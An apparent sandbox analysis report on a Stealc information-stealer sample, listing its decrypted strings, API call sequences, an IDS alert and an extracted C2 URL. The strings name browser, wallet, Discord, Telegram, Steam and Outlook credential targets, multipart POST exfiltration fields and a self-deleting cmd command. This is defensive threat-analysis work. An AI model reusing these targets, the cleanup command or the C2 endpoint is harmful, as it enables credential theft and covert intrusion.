Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: IndexedDB
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Opera Stable
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Opera GX Stable
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: CURRENT
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: chrome-extension_
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Local State
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: profiles.ini
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: chrome
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: opera
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: firefox
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: wallets
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: ProductName
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: x32
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: x64
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: DisplayName
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: DisplayVersion
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Network Info:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - IP: IP?
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - Country: ISO?
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: System Summary:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - HWID:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - OS:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - Architecture:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - UserName:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - Computer Name:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - Local Time:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - UTC:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - Language:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - Keyboards:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - Laptop:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - Running Path:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - CPU:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - Threads:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - Cores:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - RAM:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - Display Resolution:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: - GPU:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: User Agents:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Installed Apps:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: All Users:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Current User:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Process List:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: system_info.txt
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: freebl3.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: mozglue.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: msvcp140.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: nss3.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: softokn3.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: vcruntime140.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: \Temp\
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: .exe
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: runas
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: open
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: /c start
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: %DESKTOP%
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: %APPDATA%
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: %USERPROFILE%
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: %DOCUMENTS%
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: %RECENT%
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: *.lnk
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: files
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: \discord\
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: \Telegram Desktop\
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: key_datas
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: map*
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Telegram
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Tox
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: *.tox
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: *.ini
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Password
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: 00000001
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: 00000002
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: 00000003
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: 00000004
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Pidgin
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: \.purple\
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: accounts.xml
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: token:
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Software\Valve\Steam
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: SteamPath
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: \config\
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: ssfn*
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: config.vdf
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: DialogConfig.vdf
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: libraryfolders.vdf
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: loginusers.vdf
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: \Steam\
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: sqlite3.dll
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: done
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: soft
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: https
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: POST
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: HTTP/1.1
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: hwid
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: build
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: token
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: file_name
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: file
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: message
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 8.2.DADE.tmp.exe.400000.0.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00406000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,	8_2_00406000
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00404B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,	8_2_00404B80
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00407690 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	8_2_00407690
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00424090 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	8_2_00424090
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00409BE0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	8_2_00409BE0
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00409B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	8_2_00409B80
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009D78F7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	8_2_009D78F7
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009E7047 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,strtok_s,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,	8_2_009E7047
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009D4DE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	8_2_009D4DE7
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009D9DE7 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	8_2_009D9DE7
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009F42F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	8_2_009F42F7
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009D9E47 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	8_2_009D9E47
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009D6267 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	8_2_009D6267
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009E7260 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,	8_2_009E7260
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009DEFF7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	8_2_009DEFF7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\ief722WreR.exe	Unpacked PE file: 0.2.ief722WreR.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Unpacked PE file: 8.2.DADE.tmp.exe.400000.0.unpack

Source: ief722WreR.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\ief722WreR.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.7:49699 version: TLS 1.2

Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_004389F2 FindFirstFileExW,	0_2_004389F2
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024B8C59 FindFirstFileExW,	0_2_024B8C59
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009EE0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	8_2_009EE0B7
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009ED8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	8_2_009ED8A7
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009D1807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	8_2_009D1807
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009E1827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	8_2_009E1827
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009D1820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	8_2_009D1820
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009EE597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	8_2_009EE597
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009E5127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	8_2_009E5127
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009E1EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	8_2_009E1EA7
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009DDFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	8_2_009DDFD7
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009E3F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	8_2_009E3F27
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009ECF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	8_2_009ECF47

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49702 -> 92.255.57.89:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://92.255.57.89/45c616e921a794b8.php

Source: global traffic

